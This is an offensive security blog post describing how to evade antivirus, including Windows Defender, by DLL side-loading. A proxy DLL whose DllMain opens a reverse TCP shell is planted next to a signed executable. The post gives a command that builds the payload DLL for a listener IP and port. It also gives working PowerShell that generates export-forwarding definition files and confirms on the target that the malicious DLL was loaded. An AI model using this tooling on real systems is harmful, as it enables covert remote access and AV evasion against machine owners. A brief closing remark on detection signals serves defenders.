Bypassing AVs using DLL Side-Loading
In an earlier blog post I described and released a working PowerShell script that dumps the exported function names of a DLL loaded by a signed executable, compiles a "proxy" DLL from them and carries out a DLL side-loading attack. DLL side-loading lets you make "safe", signed applications run whatever code you want (applications that load their DLLs in an unsafe way, that is). This time we will use the same trick to bypass AVs, including the latest version of Windows Defender at the time of writing. We are working in the same context as the earlier blog post, so go read that first! To keep this as simple as possible we implement a plain reverse TCP connection in C++ directly inside the "proxy" DLL (B), instead of using an additional third DLL (C).
[Figure: C++ source for a simple reverse shell that runs at the DLL entry point; slightly modified from the source on sh3llc0d3r1337's GitHub]

Let's get started.
Generate “proxy” DLL
Note: make sure you have the 2019 version of "Build Tools for Visual Studio" installed.
Clone my DLLSideloader project from GitHub, load the PowerShell script into your session and execute the function shown below, passing the name of the DLL to proxy, the IP address of your listener and its port. The repository contains a binary copy of "DLL Export Viewer", a great freeware tool published by Nir Sofer. Our PowerShell script uses this application to dump the exported function names from the DLL; feel free to download the binary from nirsoft.net directly and drop it in place if you don't feel comfortable using the one provided by me.
git clone https://github.com/SkiddieTech/DLLSideloader
Invoke-AVBypassDLLSideLoad libcurl.dll 192.168.1.20 1337
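What the script does under the hood is turn the export list into a set of forwarders, so that the signed host keeps working while our DllMain runs. The snippet below is an added example of that step, not the DLLSideloader project's own code: it takes a list of export names (constructed here for illustration; in practice it comes from DLL Export Viewer or `dumpbin /exports` run against the real DLL) and writes a module-definition file in which every export of the proxy forwards to the renamed original. The names `libcurl_orig`, `proxy.cpp` and the `cl.exe` line are assumptions.

```powershell
# Added example, not the DLLSideloader project's code. Builds a forwarding
# .def file for a proxy DLL from a list of export names.

# Constructed sample export list; real input comes from DLL Export Viewer
# (or dumpbin /exports) run against the original libcurl.dll.
$exports = @(
    'curl_easy_init',
    'curl_easy_setopt',
    'curl_easy_perform',
    'curl_easy_cleanup'
)

function New-ProxyDefFile {
    param(
        [Parameter(Mandatory)] [string]   $ProxyName,    # name the host loads, e.g. libcurl
        [Parameter(Mandatory)] [string]   $RealName,     # renamed original, e.g. libcurl_orig
        [Parameter(Mandatory)] [string[]] $ExportNames,
        [Parameter(Mandatory)] [string]   $OutFile
    )
    # "name=real.name" in an EXPORTS section makes the linker emit a forwarder:
    # the loader resolves the import against the proxy, then transparently
    # continues into the real DLL. The proxy never has to implement anything;
    # only its DllMain (the reverse shell) is ours.
    $lines = @("LIBRARY $ProxyName", 'EXPORTS')
    foreach ($name in $ExportNames) {
        $lines += "    $name=$RealName.$name"
    }
    Set-Content -Path $OutFile -Value $lines -Encoding ASCII
    return $lines
}

$def = New-ProxyDefFile -ProxyName 'libcurl' -RealName 'libcurl_orig' `
                        -ExportNames $exports -OutFile '.\libcurl.def'
$def | ForEach-Object { Write-Host $_ }

# Assumed build line (Developer Command Prompt / Build Tools 2019);
# proxy.cpp holds DllMain with the reverse shell, libcurl_orig.dll is the
# renamed original shipped next to the proxy:
#   cl.exe /LD proxy.cpp /Fe:libcurl.dll /link /DEF:libcurl.def
```

Two caveats a practitioner will hit: if the host imports any function by ordinal rather than by name, the forwarder line needs the matching `@ordinal` appended so the ordinal table lines up with the original, and the proxy must be built for the same bitness (x86 or x64) as the host executable or the loader will refuse it before DllMain ever runs.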
The PowerShell script will (hopefully) run as shown below.
The following files are generated:
After moving the files over to the target host, make sure they are all in the same directory as the signed executable and run the application!
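Before trusting the callback, it is worth confirming on the target that the signed host really picked up the proxy rather than the original DLL. The function below is an added example, not part of the original post: it starts the host from the staging directory, enumerates the modules the process has loaded and, for every module whose name starts with the proxied DLL's base name, reports where it was loaded from and whether that file carries a valid Authenticode signature. The expected picture is the proxy (`libcurl.dll`) loaded from the application directory with `NotSigned`, and the renamed original (`libcurl_orig.dll`) loaded alongside it with `Valid`. The paths and names used are assumptions.

```powershell
# Added example, not from the original post: verify that the side-load
# happened and which copies of the DLL ended up in the process.
function Test-SideLoad {
    param(
        [Parameter(Mandatory)] [string] $AppPath,   # assumed: C:\stage\signedapp.exe
        [Parameter(Mandatory)] [string] $DllName    # assumed: libcurl.dll
    )
    $appDir   = Split-Path -Path $AppPath -Parent
    $baseName = [IO.Path]::GetFileNameWithoutExtension($DllName)

    # Launch from the staging directory so the loader searches it first
    # for DLLs that are not KnownDLLs and not loaded with a full path.
    $proc = Start-Process -FilePath $AppPath -WorkingDirectory $appDir -PassThru
    Start-Sleep -Seconds 2   # give the loader time to resolve imports

    # Re-query the process so the module list reflects what is loaded now.
    $modules = (Get-Process -Id $proc.Id).Modules

    $results = foreach ($m in $modules) {
        if ($m.ModuleName -like "$baseName*") {
            $sig = Get-AuthenticodeSignature -FilePath $m.FileName
            [pscustomobject]@{
                Module     = $m.ModuleName
                LoadedFrom = $m.FileName
                InAppDir   = ((Split-Path -Path $m.FileName -Parent) -ieq $appDir)
                Signature  = $sig.Status                    # NotSigned for the proxy, Valid for the original
                Signer     = $sig.SignerCertificate.Subject # $null when unsigned
            }
        }
    }
    return $results
}

Test-SideLoad -AppPath 'C:\stage\signedapp.exe' -DllName 'libcurl.dll' | Format-List
```

Run this from a PowerShell of the same bitness as the host process, otherwise module enumeration is incomplete. The same observation is what a defender would key on: a signed executable loading an unsigned DLL of a well-known name from its own directory (for example Sysmon's image-load event with signature information) is a much stronger signal than anything in the proxy's code, which is exactly why the AV engine misses it.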